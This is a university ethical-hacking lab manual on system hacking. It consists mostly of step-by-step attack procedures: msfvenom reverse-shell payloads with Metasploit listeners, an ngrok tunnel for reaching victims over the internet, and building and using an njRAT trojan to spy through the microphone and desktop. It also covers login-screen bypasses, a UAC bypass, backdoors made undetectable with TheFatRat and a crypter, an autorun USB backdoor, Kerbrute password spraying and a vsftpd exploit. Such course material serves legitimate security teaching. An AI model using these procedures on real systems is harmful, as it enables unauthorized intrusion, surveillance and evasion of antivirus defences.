CYS 506 - Lab5

College of Computer Science and Information Technology
‫كلية علوم الحاسب وتقنية المعلومات‬
Networks and Communications

CYS506 Ethical Hacking
Student Procedural Manual
2022/23
IMAM ABDULRAHMAN BIN FAISAL UNIVERSITY
College Department Course
College of Computer Science Networks and Ethical Hacking (CYS
and Information Technology Communications 506)
Practical Session Plan
Session Topic/Title Session No. Session Duration

(Minutes)
System Hacking 5 120
1- Session Please list the Session Learning Outcomes (SLOs), as presented in the
Outcomes ABET Student Outcomes A to K.
Note: The sequence of instruction may vary and you may start with the most
essential SLO. 1 is the most important one, followed by 2, 3 and 4, as per
time availability.
1. Outcome A: Bypassing access controls to gain access to the system (such as

password cracking and vulnerability exploitation.
2. Outcome B: Acquiring the rights of another user or an admin (privilege
escalation.
3. Outcome C: Creating and maintaining remote access to the system (executing
applications such as trojans, spyware, backdoors, and keyloggers).
4. Outcome D: Hiding the evidence of compromise (clearing logs).
2- Tool(s)/Software .
• Msfvenom
• Metasploit
• njRAT
3- procedural steps
(Tasks)
System hacking is the process of testing computer systems and software for security
vulnerabilities that an attacker could exploit to gain access to the organization’s
systems to steal or misuse sensitive information.
There are four steps in the system hacking:
• Gaining Access: Use techniques such as cracking passwords and exploiting
vulnerabilities to gain access to the target system.
• Escalating Privileges: Exploit known vulnerabilities existing in OSes and
software applications to escalate privileges.
• Maintaining Access: Maintain high levels of access to perform malicious
activities such as executing malicious applications and stealing, hiding, or
tampering with sensitive system files.
• Clearing Logs: Avoid recognition by legitimate system users and remain
undetected by wiping out the entries corresponding to malicious activities in the
system logs, thus avoiding detection.
CYS506 - Ethical Hacking

1|Page

Lab Tasks:
Part 1: Exploit Client-Side Vulnerabilities and Establish a VNC
Session
Here, we will see how attackers can exploit vulnerabilities in target systems to
establish unauthorized VNC sessions using Metasploit and remotely control these
targets.
1- In the Kali Terminal, type msfvenom -p windows/meterpreter/reverse_tcp

--platform windows -a x86 -f exe LHOST=<IP Address of Host Machine>
LPORT=444 -o /root/Desktop/Test.exe and press Enter.
2- This will generate Test.exe, a malicious file, on Desktop, as shown in the

screenshot.
Note: To navigate to the Desktop folder, click Places from the top-section of the
Desktop and click Home Folder from the drop-down options. In the attacker
window, click File System from the left-pane and navigate to the location
/root/Desktop.

2|Page
3- Now, create a directory to share this file with the target machine, provide
the permissions, and copy the file from Desktop to the shared location
using the below commands:
• Type mkdir /var/www/html/share and press Enter to create a

shared folder.
• Type chmod -R 755 /var/www/html/share and press Enter.
• Type chown -R www-data:www-data /var/www/html/share and
press Enter.
• Copy the malicious file to the shared location by typing cp
/root/Desktop/Test.exe /var/www/html/share and pressing Enter.
Note: Here, we are sending the malicious payload through a shared

directory; but in real-time, you can send it via an attachment in an email or
through physical means such as a hard drive or pen drive.

3|Page

4- Now, start the apache service. To do this, type service apache2 start and
press Enter.
5- Type msfconsole and press Enter to launch the Metasploit framework.

6- In msfconsole, type use exploit/multi/handler and press Enter.

4|Page

7- Now, set the payload, LHOST, and LPORT. To do so, use the below
commands:
• Type set payload windows/meterpreter/reverse_tcp and press Enter.

• Type set LHOST 10.10.10.13 and press Enter.
• Type set LPORT 444 and press Enter.
Note: the LHOST is the kali machine IP address, you can find it by
typing ifconfig in the terminal.
8- After entering the above details, type exploit and press Enter to start the
listener.
9- Open any web browser (here, Mozilla Firefox). In the address bar, type
http://10.10.10.13/share and press Enter. As soon as you press enter, it will
display the shared folder contents, as shown in the screenshot.
10- Click Test.exe to download the file.

5|Page

11- Once you click on the Test.exe file, the Opening Test.exe pop-up appears;
select Save File.
12- The malicious file will download to the browser’s default download location
(here, Downloads). Now, navigate to this location and double-click the
Test.exe file to run it.
13- Leave the Windows 10 virtual machine running, so that the Test.exe file
runs in the background and switch to the Kali virtual machine.
14- Observe that one session has been created or opened in the Meterpreter
shell, as shown in the screenshot.

6|Page
15- Type sysinfo and press Enter to verify that you have hacked the targeted
Windows 10.
Note: If the Meterpreter shell is not automatically connected to the session,

type sessions -i 1 and press Enter to open a session in Meterpreter shell.
16- Now, open another Kali Terminal and navigate to the root directory.
17- In the Terminal window, type git clone
https://github.com/PowerShellMafia/PowerSploit and press Enter. The
PowerSploit repository is downloaded to the root directory.

7|Page
18- Now, switch back to the Terminal window with an active Meterpreter
session. Type upload /root/PowerSploit/Privesc/PowerUp.ps1 PowerUp.ps1
and press Enter. This command uploads the PowerSploit file (PowerUp.ps1)
to the target system’s present working directory.
19- Type shell and press Enter to open a shell session. Observe that the present
working directory points to the Downloads folder in the target system.

8|Page

20- Type powershell -ExecutionPolicy Bypass -Command ".
.\PowerUp.ps1;Invoke-AllChecks" and press Enter to run the
PowerUp.ps1 file.
Note: PowerUp.ps1 is a program that enables a user to perform quick checks

against a Windows machine for any privilege escalation opportunities. It
utilizes various service abuse checks, .dll hijacking opportunities, registry
checks, etc. to enumerate common elevation methods for a target system.
21- A result appears, displaying vulnerabilities in unquoted service paths,

service executables, argument permissions, DLL locations, service
permissions, unattended install files, and other locations.

9|Page

22- Now, type exit and press Enter to revert to the Meterpreter session.
23- Now, exploit VNC vulnerability to gain remote access to the Windows 10
virtual machine. To do so, type run vnc and press Enter.
24- This will open a VNC session for the target machine, as shown in the
screenshot. Using this session, you can see the victim’s activities on the
system, including the files, websites, software, and other resources the user
opens or run.

10 | P a g e

Part 2: Hacking Devices on the Internet (Outside your local network)
Most of the hacking incidents happens outside your local network (Hacking at a
distance). Ngrok is a tool that creates a secure tunnel from a public endpoint to a
locally running web service. you can use the command line interface to start ngrok
and specify the port number of the local web server that you want to expose. Ngrok
will then create a secure tunnel to the internet, allowing anyone to access your
local web server from anywhere in the world.
• You can follow this tutorial to set up Ngrok: https://youtu.be/LYmhwKVNjk4

o (00:00 till 2:34)
1- Using any web browser, access ngrok website (https://ngrok.com/download) and sign
up.
2- Fill the needed information.

11 | P a g e

3- You will receive a verification email, open it and open the link attached.
4- Click on Download for linux
5- Move to download folder in Kali Linux

6- tar zxvf <the ngrok downloaded file>
7- Every account has a unique token, copy the command that appears in your browser.

12 | P a g e
8- Now, in the terminal type ./ngrok tcp 4444

o Make sure to verify your account by clicking the link sent to you through email
9- In a new terminal type msfvenom -p windows/meterpreter/reverse_tcp --platform

windows -a x86 -f exe LHOST=<ngrok server> LPORT=<ngrok Port> -o evil.exe
(here, <ngrok server is 0.tcp.in.ngrok.io, and the port is 14616)

13 | P a g e
10- Open msfconsole, and type use exploit/multi/handler , then the following options:
• Set payload windows/meterpreter/reverse_tcp
• Set LHOST 0.0.0.0
• Set LPORT 4444
• Set exitonsession false
• exploit -j -z
after you deliver the payload to the victim, and the victim execute the file, a TCP session
establish between the attacker and the victim as in the figure below.

14 | P a g e
11- this concludes our lab on hacking devices on the internet.

12- read about the TheFatRat, which is similar to msfvenom but with more advanced
payloads.

15 | P a g e

Part 3: System Hacking Using Remote Access Trojan (RAT)
A computer Trojan is a program with malicious or harmful code contained inside

apparently harmless programming or data in such a way that the program can
gain control and cause damage such as ruining the file allocation table on the hard
disk.
njRAT is a remote access Trojan (RAT) tool that is designed to allow remote access
to a victim's computer system. It is a type of malware that is typically spread
through phishing emails or malicious downloads, and once installed on a victim's
computer, it allows the attacker to perform a variety of actions, such as:
Stealing sensitive data: njRAT can be used to steal passwords, login credentials,
credit card numbers, and other sensitive data from the victim's computer.
Remote control: The attacker can take remote control of the victim's computer,
which means they can access and control the system as if they were physically
present in front of it.
Installing additional malware: njRAT can be used to download and install

additional malware on the victim's computer.
Spying: The attacker can use njRAT to spy on the victim's activities, such as
recording keystrokes or capturing screenshots.
Denial of Service (DoS) attacks: njRAT can be used to launch DoS attacks against
websites or other targets.

16 | P a g e

1- From any web browser, access the following link to download njRAT Green
Edition (https://github.com/adarift/njRAT). Click on Releases.
2- Click on njRAT Green Edidtion to start download.
Note: ensure that windows defender is turned off and other antivirus
programs.
https://www.technipages.com/how-to-stop-chrome-from-blocking-
downloads/#:~:text=Chrome%3A%20How%20to%20Stop%20the%20Browser%20from%20
Blocking%20Your%20Downloads&text=Go%20to%20Settings%20and%20click,No%20Pro
tection%20(Not%20recommended).

17 | P a g e
3- Open the downloaded file and double-click on njRAT to start the program.

18 | P a g e

4- The application start and asks to choose the port to use in attacks, choose port 7777
and click start.
Note: if the port is used by the system, the application should indicate an error that the
port is busy.
5- The following user interface would appear, down to the right of the window click
on builder.

19 | P a g e

6- The following builder window appear, from here you can customize the trojan. In
the Host field type your IP address or leave it default (127.0.0.1) then press on the
+ sign. After adding the host, press on Build.
7- After the trojan is created, save it in the desktop. Double-click the Server.exe file.

20 | P a g e
8- The trojan will start execution and start a tunnel from the victim’s computer to
the njRAT application.
9- Right-click on the victim’s computer from the njRAT console and click Manager.

21 | P a g e

10- The following window appear, from this window you can access the entire file
directory.
11- Click on connections tap in the top of the console. From this tap, you can see all the
victim’s connections and kill the connection.

22 | P a g e
12- Click on Registry tap in the top of the console. From this tap, you can access
windows registry and modify.
13- Click on Remote Shell from the top of the console. From this tap, you can execute
CMD commands.

23 | P a g e
14- Now, go back to the main console and click on Remote Desktop.
15- From this service, you can control the victim’s computer.

24 | P a g e
16- Go back to the main console and click on Microphone.
17- From this service, you can listen to the victim’s microphone.
18- Go back to the main console and click on Open Chat.

25 | P a g e
19- This service will allow the attacker to communicate with the victim.
20- This concludes the demonstration of njRAT tool.

26 | P a g e
4- Assessment Plan questions/tasks to confirm that students have achieved each of the
above SLOs. Outcome 1 is the most important one, followed by 2, 3 and
4, as per time availability. The questions/tasks below are just for guidance
and the laboratory instructor can come up with his own questions/tasks.
5- Resources Suggest further resources for the students to manage their learning after the
class. Make sure that the resources are specific and different to suit all
students, e. g. Figures, Tables, Links, etc.

27 | P a g e

Part 4: Extra System Hacking Tactics, Techniques, and Procedures
(Optional)
The Ethical Hacking Course is an extensive program that covers various aspects
of hacking, including System Hacking. In the laboratory material for this course,
Part 4: Extra System Hacking Tactics, Techniques, and Procedures is an optional
section that contains additional information for those interested in exploring this
topic more deeply.
It's important to note that Part 4 is not mandatory and is only included for general
knowledge purposes. The laboratory material covers everything that is needed to
understand System Hacking in Parts 1 to 3, which are comprehensive and provide
a solid foundation on this topic.
If you are interested in exploring System Hacking further, Part 4 can be a valuable
resource. This section includes extra tactics, techniques, and procedures that can
be useful for those who want to go deeper into this subject. However, please keep
in mind that this section is optional and not required for the completion of the
course. This part “Part 4: Extra System Hacking Tactics, Techniques, and
Procedures (Optional)” include the following activities:
• Bypass Windows Login Screen

• Bypass MAC OS Login Screen
• Bypass Linux Login Screen
• Windows Privilege Escalation
• Antivirus backdoor evasion
• Advanced Antivirus Evasion Techniques
• USB Rubber Ducky
• Active Directory Intrusion
• System Hacking Using Remote Desktop Protocol (RDP)
• System Hacking Using FTP Protocol.
• System Hacking Using SMB Protocol
• System Hacking Using SSH Protocol
• Hacking MacOS and Linux Systems
• Perform Buffer Overflow Attack to Gain Access to a Remote System
Disclaimer: Part 4 of the System Hacking lab is designed to provide educational

information on the techniques used by hackers to gain unauthorized access to
computer systems and to raise awareness of potential vulnerabilities. The content
and activities in the lab are for educational purposes only, and the author do not
intend them for any illegal or malicious activities.

28 | P a g e

Part 4.1: Bypass Windows Login Screen
The Windows login screen is the first screen that appears when a user starts their computer and
prompts the user to enter their username and password to access the operating system. This
screen is an essential security feature that prevents unauthorized users from accessing the
computer's resources and data.
The SAM (Security Accounts Manager) file is a database that stores user account
information, including usernames and password hashes. This file is located in the
Windows/System32/config directory and is only accessible to users with administrative
privileges.
When a user enters their username and password on the Windows login screen, the operating
system compares the password hash stored in the SAM file with the hash of the password
the user entered. If the hashes match, the user is granted access to the computer, and their user
profile is loaded.
It's important to note that the SAM file is a critical component of the Windows security
model and must be protected from unauthorized access. Malicious actors may try to obtain
this file to perform password cracking attacks or gain unauthorized access to a system.
Therefore, it's important to ensure that appropriate access controls and security measures are
in place to protect the SAM file and other sensitive system files.
1- Using a web browser access kali Linux download page, and download kali Live Boot,
in which it will be used to boot the victim’s computer from a USB.

29 | P a g e

2- From your web browser, access Rufus website (https://rufus.ie/en/) and download
Rufus program.
3- Execute Rufus. Choose your USB device from the Device list, then select kali live
boot image and click start.

30 | P a g e

4- After Rufus is completed setting up the bootable USB, restart your computer.

31 | P a g e

5- After the device reboot, immediately press on F12 button to access the BIOS
setting page. Choose UEFI: SanDisk , Partition 1 and press Enter.
Note: the name of the device might differ in your lab.
6- Live Boot kali Linux start page appear, press Enter on Live System (amd64).

32 | P a g e

7- Click on the disk to view the file system.
8- Copy the path to the disk. And open a new terminal.

33 | P a g e

9- In the terminal, type cd /media/kali/<Disk name>/Windows/System32
10- Now type, cd config. Then type ls | grep SAM to see if the file exists. After this,
type chntpw -i SAM

34 | P a g e

11- The chntpw console appear, click 1 and enter. The choose the user to Bypass by the
computer RID.
12- Now, type 1 and enter, then type 2 and enter.

35 | P a g e
13- Then press q and enter.

36 | P a g e

14- Now you are in chntpw main console, Press q and enter.
15- Now, type y to save the changes on the SAM file.

37 | P a g e

16- Restart the device to go back to the windows machine.
17- Now the computer without a password and you can access all the files.
18- This concludes the demonstration of Bypass windows login screen.

38 | P a g e

Part 4.2: Bypass MAC OS Login Screen
The macOS login screen is the first screen that appears when you start up your Mac. It
prompts you to enter your username and password to access your account. The login screen
is usually customized with a background image and displays the names of any user accounts
that have been set up on the computer.
In macOS, user account passwords are stored securely using the Keychain, which is a
password management system built into the operating system. The Keychain stores
passwords, security certificates, and other sensitive information, and it is protected by a
master password that the user sets during account setup.
When you enter your password on the login screen, macOS verifies it by checking it against
the password hash stored in the Keychain. A hash is a mathematical algorithm that converts
a password into a fixed-length string of characters, making it more secure than storing the
password in plain text.
If the password entered on the login screen matches the password hash stored in the Keychain,
macOS grants access to the user account. If the password is incorrect, the user is prompted to
try again or reset the password.
1- Restart your MAC OS computer.

39 | P a g e

2- Immediately after the apple sign appear, press and hold Command+R keys.

40 | P a g e

3- Recovery page would appear. From the bar in the top, press on Utilities and then
press on Terminal.
4- A Terminal prompt will appear, type resetpassword.

41 | P a g e

5- The password recovery page appears, and you can now change the password.

42 | P a g e

Part 4.3: Bypass Linux Login Screen
The Linux login screen, also known as the login manager or display manager, is
the graphical user interface that appears when a user boots up their Linux system.
The login screen prompts the user to enter their username and password to gain
access to the system.
The exact appearance of the Linux login screen can vary depending on the
distribution of Linux being used and the chosen desktop environment. However,
common elements typically include a login prompt, password field, and a list of
available users. Some login screens may also include additional features such as
password strength indicators, session selection, and accessibility options.
Like any software, the Linux login screen can potentially have vulnerabilities that
could be exploited by malicious actors. Common vulnerabilities in login screens
can include weaknesses in authentication mechanisms, password brute-forcing
vulnerabilities, buffer overflow vulnerabilities, and root access.
To mitigate these risks, Linux developers and security experts regularly perform
security audits and patches to address any vulnerabilities discovered in the login
screen or other components of the operating system. Users can also take steps to
enhance the security of their login screen, such as using strong and unique
passwords, enabling two-factor authentication, and ensuring that their system
software is up to date.
1- At the System menu, enter the E button.

43 | P a g e

2- After pressing on the E button, System boot configuration appears. in line
10 “Linux”, change ro (read only) to rw (read-write), then after quite splash
add init=/bin/bash to access a root shell. Tehn press Ctrl+x to reboot

44 | P a g e

3- Now, after reboot, you have accessed the root shell.
4- Type, passwd root and enter. Then provide the password of the root.
5- reboot the system and you will see that the root account password changed.

45 | P a g e

Part 4.4: Windows Privilege Escalation
Windows Privilege Escalation is the process of gaining elevated permissions or privileges

on a Windows-based computer system beyond what is normally granted to a user. Privilege
escalation is a common technique used by attackers to gain access to sensitive resources
and data on a computer system.
In a Windows environment, there are several levels of privileges that a user can have, ranging
from basic user-level access to administrator-level access. Basic user-level access is the
most restrictive, while administrator-level access allows a user to make changes to the
system configuration, install software, and perform other privileged operations.
An attacker who gains access to a Windows system with basic user-level access may attempt
to escalate their privileges to administrator-level access to gain more control over the
system. There are several techniques that attackers may use to achieve this goal, including:
Exploiting vulnerabilities: Attackers may exploit vulnerabilities in the Windows operating

system or other software installed on the system to gain elevated privileges.
Using default credentials: Attackers may try to use default or weak credentials to gain access
to administrative accounts.
Stealing credentials: Attackers may use techniques like keylogging or phishing to steal login
credentials for administrative accounts.
Leveraging misconfigurations: Attackers may exploit misconfigurations or weak security
settings on the system to gain elevated privileges.
Once an attacker has gained elevated privileges on a Windows system, they can perform a wide
range of malicious activities, such as installing malware, stealing sensitive data, or launching
further attacks on other systems.
To prevent privilege escalation attacks, it is important to follow best practices for securing
Windows systems, such as using strong passwords, limiting administrative access to only
those who need it, keeping software up-to-date with security patches, and using security
tools like firewalls and anti-virus software.
1- Open your kali machine and open a new Terminal and type msfvenom -p
windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe
LHOST=<your IP> LPORT=4445 -o /var/www/html/PrivilegeEsclation2.exe
Then type service apache2 start.

46 | P a g e

2- In the terminal type msfconsole, and type the following:
• use multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST <your IP>
• set LPORT 4445
• exploit
3- using a web browser in the victim’s machine, access your IP address and run the
program.

47 | P a g e

4- after the victim run the program, a meterpreter session is opened. Type background
to leave the session in background. Then type search uac.
5- a list of Bypass UAC post exploitation tools appears. Type use

exploit/windows/local/bypassuac or use 5.

48 | P a g e

6- Type show sessions to know the meterpreter session ID. And then type set session
<session ID>.
7- Now, type run. As you can see that the privileges is already escalated, but in other
users, a new meterpreter powershell session will start.
8- This concludes the demonstration of windows privilege escalation.

49 | P a g e

Part 4.5: Antivirus backdoor evasion
Antivirus backdoor evasion is a technique used by malware creators to bypass

antivirus software and avoid detection. A backdoor is a type of malware that
provides a remote attacker with unauthorized access to a compromised system,
and antivirus software is designed to detect and remove such malware. However,
malware creators use various methods to evade detection by antivirus software,
including:
Polymorphic code: Malware creators use polymorphic code to change the structure
of the malware in a way that makes it difficult for antivirus software to detect.
The code is changed every time the malware is executed, making it hard to identify
a specific pattern.
Code obfuscation: Malware creators use code obfuscation to hide the true intent of
the code. This makes it harder for antivirus software to identify the code as
malicious.
Encryption: Malware creators use encryption to hide the true nature of the
malware. The malware is encrypted in a way that it cannot be read by the
antivirus software, making it difficult to detect.
Fileless malware: Malware creators use fileless malware to avoid detection by

antivirus software. Fileless malware operates in memory and does not write any
files to the disk, making it difficult for antivirus software to detect.
Anti-analysis techniques: Malware creators use various anti-analysis techniques

to make it difficult for antivirus software to analyze the malware. These
techniques include using virtual machines, sandboxing, and other methods to
make it difficult for antivirus software to execute the malware and detect its
behavior.

50 | P a g e

1- From your web browser, access TheFatRat GitHub and download the program.
2- In the terminal, type cd <path to ThFatRat>, then type chmod -R 755 <path to
ThFatRat>. Then type ./setup.sh
Note: -R enable recursive permission granting

51 | P a g e

3- Select “Install backdoor factory from kali repository.”
4- Here, just press enter to set the default output folder.

52 | P a g e

5- Here, press y.
6- Now, in the terminal type fatrat.

53 | P a g e

7- Type 3 “Create Fud backdoor with Avoid 1.2”
8- Type the backdoor name, and name the auto files Auto.

54 | P a g e

9- Then setup the connection, LHOST: <your IP>, LPORT: 4444.
10- Now, choose 3 “super stealth”.

55 | P a g e

11- After the process in done, the file location is printed in the screen.
12- Take the backdoor and place it in /var/www/html. Then in the terminal type, service
apache2 start. In your windows machine access the kali IP from a web browser and
download the backdoor while the windows defender in turned on.
As illustrated, windows defender couldn’t detect the backdoor.

56 | P a g e

Part 4.6: Advanced Antivirus Evasion Techniques
Advanced antivirus evasion techniques are used by malware authors to evade detection by
antivirus software. These techniques are designed to make it more difficult for antivirus
software to identify and remove malicious code from infected systems.
Some common advanced antivirus evasion techniques include:

Polymorphic malware: Polymorphic malware is a type of malware that changes its code
structure with each infection, making it more difficult for antivirus software to identify and
block.
Code obfuscation: Code obfuscation involves modifying the source code of a malware
program in such a way that it becomes more difficult for antivirus software to recognize and
identify malicious code.
Rootkit techniques: Rootkits are a type of malware that are designed to hide their presence
from the operating system and antivirus software. Rootkits can be used to modify system files,
processes, and registry keys to avoid detection.
Fileless malware: Fileless malware is a type of malware that does not leave any files on the
infected system. Instead, it resides in the memory of the system, making it more difficult for
antivirus software to detect.
Sandbox evasion: Sandboxes are virtual environments that allow antivirus software to test and
analyze suspicious files in a safe and isolated environment. Malware authors can use sandbox
evasion techniques to detect and evade these virtual environments, making it more difficult for
antivirus software to detect and remove the malware.
1- Download SwayzCryptor and open the program. Press on the 3 dots on File.

57 | P a g e

2- Select the backdoor used in the Part 4.5.
3- Now, press on the 3 dots in the icon and choose and .ico file.

58 | P a g e

4- Bind the application with a well-known program to harden the dynamic analysis.
Also check the boxes as in the figure. Then press Encrypt.
5- An encrypted file is generated and saved in the Desktop.

59 | P a g e

6- Right-click on the encrypted file and create a RAR Archive.
7- Protect the file with a password by pressing Set password button.

60 | P a g e

8- Type your password and click ok.
9- Then press ok.

61 | P a g e

10- Upload the file to virus Total to see how many security vendor can detect the
malware.

62 | P a g e

Part 4.7: USB Rubber Ducky
A USB Rubber Ducky is a type of USB device that looks like a regular USB flash
drive but is actually a tool used for penetration testing and other security-related
tasks. The device is designed to simulate a keyboard, allowing it to execute pre-
programmed keystrokes and commands on a target computer. The keystrokes can
be programmed to perform a wide range of actions, such as opening a command
prompt, launching a script, or running a malicious payload.
The USB Rubber Ducky is often used by security professionals for testing the
security of computer systems and networks, as well as for educational purposes.
It can be used to test the effectiveness of security measures and identify potential
vulnerabilities in computer systems.
The device is typically programmed using a simple scripting language called

Ducky Script, which is easy to learn and can be used to create complex scripts.
The Ducky Script is essentially a set of commands that the USB Rubber Ducky
will execute on the target computer when it is plugged in.
The USB Rubber Ducky is designed to work with any operating system that
supports USB keyboards, including Windows, macOS, and Linux. Once the device
is plugged into a target computer, it will execute the pre-programmed keystrokes
and commands, which can be used to perform a wide range of tasks.
While the USB Rubber Ducky can be a powerful tool for security testing, it can
also be used for malicious purposes, such as stealing sensitive data or installing
malware on a target computer. As such, it is important to use the device
responsibly and only for legitimate purposes. It is also important to take steps to
protect against USB-based attacks, such as disabling USB ports or using USB
data blockers to prevent data transfer.

63 | P a g e

1- From your web browser, download samlogin auto-run USB
(https://www.samlogic.net/usb-autorun-creator/usb-autorun-creator.htm).
2- Press on “SamLogic: USB AutoRun Creator – Demo (6MB)”

64 | P a g e

3- Follow the wizard installation and restart your computer. Then press windows key
and type USB Auto run.
4- The main GUI will appear.

65 | P a g e

5- Now, go back to your kali machine and create a backdoor.
6- Setup the Metasploit listener.

66 | P a g e

7- From your windows machine, access the kali IP and download the backdoor.
8- Press on select to select the backdoor.

67 | P a g e

9- Select your backdoor and click open.
10- Then, click on browse to select the USB drive.

68 | P a g e
11- The USB drive in this case is volume D and click OK.
Note: the drive volume and location might differ in your lab environment.
12- Then press on create button.

69 | P a g e

13- Now, unplug the USB from your device, and plug it again. Once the USB is
plugged, a meterpreter session is opened.
14- This concludes the demonstration of USB Rubber Ducky.

70 | P a g e

Part 4.8: Active Directory Intrusion
Active Directory is a centralized database that stores information about users,

computers, and other resources in a networked environment. It provides
authentication and authorization services to manage access to network resources.
Kerberos is a network authentication protocol that is commonly used by Active
Directory to authenticate users and services.
Kerbrute is a tool used for password spraying and brute-forcing attacks against
the Kerberos authentication protocol. It can be used to test the strength of user
passwords or to attempt to gain unauthorized access to an Active Directory
environment.
An Active Directory intrusion using Kerbrute typically involves the following

steps:
Enumeration: The attacker performs reconnaissance to identify the target

environment's Active Directory infrastructure, including domain names, domain
controllers, and user accounts.
Password spraying: The attacker uses Kerbrute to test a list of commonly used
passwords against a large number of user accounts in the target Active Directory
environment. This is done to identify weak passwords that can be used to gain
access.
Brute-forcing: If the password spraying attack is unsuccessful, the attacker may

use Kerbrute to perform a brute-force attack against a specific user account. This
involves attempting to guess the password by trying a large number of different
combinations until the correct one is found.
Privilege escalation: Once the attacker gains access to a user account, they may
attempt to escalate their privileges to gain access to more sensitive information or
resources in the network.
Lateral movement: The attacker may then attempt to move laterally through the
network by compromising additional user accounts or exploiting vulnerabilities in
other systems to gain access to additional resources.
Data exfiltration: Finally, the attacker may attempt to exfiltrate sensitive data
from the network, which can be used for malicious purposes such as identity theft
or financial fraud.

71 | P a g e

To prevent Active Directory intrusions using Kerbrute, organizations should
ensure that strong passwords are used and regularly changed, and that all
software and systems are kept up to date with security patches. Additionally,
multi-factor authentication should be used wherever possible to provide an
additional layer of security. Regular security audits and penetration testing can
also help to identify and address potential vulnerabilities before they can be
exploited by attackers.
1- Using your web browser, access Kerbrute Github account

(https://github.com/ropnop/kerbrute) and press on releases.
2- Press on“Kerbrute_linux_amd64”

72 | P a g e

3- Open a terminal and type chmod +x kerbrute_linux_amd64
4- Start your Windows Server 2012R2.

73 | P a g e

5- Create a wordlist of users and type ./kerbrute_linux_amd64 userenum –dc <server
IP> -d <domain> <username wordlist>
6- Now, to find the password of ksh@Khaled.com type ./kerbrute_linux_amd64

bruteuser –dc <Server IP> -d <domain> <password list> <user> (user in this case
is “ksh”)

74 | P a g e

7- Now, after we have determined the user and password, we can initiate an intrusion to
the active directory on the domain Khaled.com. type crackmapexec smb -u <user> -
p <password>
8- We can also list the folders in the computer of the user. Type crackmapexec smb -u
<user> -p <password> --shares

75 | P a g e

Part 4.9: System Hacking Using Remote Desktop Protocol (RDP)
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft

that enables users to remotely connect to a computer over a network connection.
RDP allows a user to access and control a remote computer as if they were
physically sitting in front of it.
RDP is used extensively in business environments to provide remote access to

servers, desktops, and applications. It allows remote workers to access company
resources from home or on the go, increasing productivity and flexibility. RDP is
also used by IT professionals for remote support and troubleshooting.
To use RDP, both the remote computer and the local computer must have RDP
client software installed. The local computer initiates a connection to the remote
computer by specifying its IP address or hostname and providing valid login
credentials. Once connected, the user can control the remote computer using their
keyboard and mouse.
RDP is a secure protocol that uses encryption to protect the transmission of data
between the local and remote computers. However, it is important to ensure that
RDP is configured securely to prevent unauthorized access and data breaches.
However, RDP is also a common target for attackers who seek to exploit its vulnerabilities to
gain unauthorized access to a remote computer. Some common RDP exploits include:
Brute Force Attacks: Attackers attempt to guess the login credentials for a remote desktop
using a list of common passwords or dictionary attacks. If successful, the attacker gains full
control over the target machine.
BlueKeep Exploit: BlueKeep is a security vulnerability that affects older versions of Microsoft
Windows operating systems, including Windows 7 and Windows Server 2008. The exploit
allows an attacker to gain full access to a target computer without authentication.
Man-in-the-Middle Attacks: Attackers intercept RDP traffic between the client and the
server, allowing them to eavesdrop on communications and steal sensitive information.
Denial-of-Service (DoS) Attacks: Attackers flood the RDP server with traffic, causing it to
crash or become unresponsive. This prevents legitimate users from accessing the server.
To mitigate RDP exploits, it is recommended to use strong passwords, implement two-factor

authentication, update software and operating systems regularly, and use a virtual private
network (VPN) to encrypt traffic between the client and the server.

76 | P a g e

1- Right-click on your MS server windows. And press on System.
2- From the left panel, click on Remote settings.

77 | P a g e

3- Allow remote connection to this computer and uncheck the check box.
4- On your kali machine, open a new terminal and type nmap -p 3389 –script rdp-
enum-encryption <Server IP>

78 | P a g e

5- Then type, rdesktop -d <domain> -u <Server username> -p <password> <server
IP>
6- Now, you can use the Server remotely.

79 | P a g e

Part 4.10: System Hacking Using FTP protocol.
FTP, or File Transfer Protocol, is a standard communication protocol used to transfer files over
the internet or other networks. It was first introduced in 1971 and has since undergone several
revisions to improve its functionality.
FTP works on a client-server model where the client computer requests files from the server
computer, which then sends them back to the client. The client and server communicate over a
TCP/IP network using a series of commands and responses.
FTP supports two modes of data transfer: ASCII and binary. ASCII mode is used for
transferring text files, while binary mode is used for transferring non-text files such as images,
audio, and video files.
FTP also supports user authentication, allowing users to log in to the server with a username
and password. Once authenticated, users can access their files on the server, download files
from the server, or upload files to the server.
vsFTPd (Very Secure FTP daemon) is an open-source FTP server that is used to transfer files
over the Internet. In the past, vsFTPd has been vulnerable to a number of security issues. Here
are some of the most notable vulnerabilities:
Backdoor in vsFTPd 2.3.4: In July 2011, it was discovered that the official vsFTPd download
site had been compromised and a backdoor had been added to the vsFTPd 2.3.4 tarball. This
backdoor allowed attackers to gain remote access to a system running the compromised version
of vsFTPd.
Denial of Service (DoS) vulnerability in vsFTPd 2.3.2: In August 2010, a DoS vulnerability
was discovered in vsFTPd 2.3.2. This vulnerability could be exploited by a remote attacker to
crash the vsFTPd server.
Heap-based buffer overflow in vsFTPd 2.3.2: In November 2011, a heap-based buffer

overflow vulnerability was discovered in vsFTPd 2.3.2. This vulnerability could be exploited
by a remote attacker to execute arbitrary code on the affected system.
Integer overflow vulnerability in vsFTPd 2.3.4: In October 2011, an integer overflow

vulnerability was discovered in vsFTPd 2.3.4. This vulnerability could be exploited by a
remote attacker to execute arbitrary code on the affected system.
It's worth noting that these vulnerabilities have been patched in newer versions of vsFTPd. It's
important to keep your software up to date to avoid known vulnerabilities.

80 | P a g e

1- Open metasploitable virtual machine.
2- In your kali machine, create a new terminal and type, nmap -p 21 –script=vuln
<server IP>

81 | P a g e

3- Open Metasploit by typing msfconsole and type search vsftpd, then type use 0.
4- Setup the exploit parameter:

• Set RHOSTS <Server IP>
• Exploit
Then you will have access to the system.
5- This concludes the demonstration of vsftpd vulnerability.

82 | P a g e

Part 4.11: System Hacking Using SMB Protocol
SMB (Server Message Block) is a network protocol used for sharing files, printers, and other
resources between computers on a network. It was originally developed by Microsoft for use
in its Windows operating system but has since been adopted by other platforms as well.
The SMB service allows computers on a network to access shared resources on other
computers. This is done by establishing a connection between the client (the computer
requesting the resource) and the server (the computer hosting the resource) using the SMB
protocol.
SMB provides a set of commands that allow the client to access files and other resources on
the server. These commands include opening and closing files, reading and writing data, and
listing the contents of directories.
SMB also supports authentication and authorization, allowing access to resources to be

restricted to authorized users or groups. This can be done using passwords, access control lists
(ACLs), and other security measures.
The MS17-010 vulnerability is a critical remote code execution vulnerability that affects the
Microsoft Server Message Block (SMB) protocol. This vulnerability was discovered by the
National Security Agency (NSA) and leaked by a group called Shadow Brokers in April 2017.
